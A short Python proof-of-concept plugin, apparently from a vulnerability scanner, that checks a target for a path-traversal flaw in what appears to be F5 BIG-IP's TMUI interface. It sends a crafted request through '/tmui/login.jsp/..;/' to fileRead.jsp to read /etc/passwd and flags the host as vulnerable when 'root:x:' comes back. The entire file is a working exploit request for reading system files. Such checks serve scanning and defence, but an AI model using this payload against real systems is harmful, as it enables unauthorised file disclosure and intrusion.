#!/usr/bin/env python3
# -*- coding: utf-8 -*-

"""
Copyright (c) saucerman (https://saucer-man.com)
See the file 'LICENSE' for copying permission
"""

from lib.core.Request import request
from plugin.target_parse import get_standard_url


def poc(url):
    vuln_url = f"{get_standard_url(url)}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
    try:
        r = request.get(vuln_url, verify=False, allow_redirects=False, timeout=5)
        if r.status_code == 200 and "root:x:" in r.text:
            return vuln_url
    except:
        pass
    return False
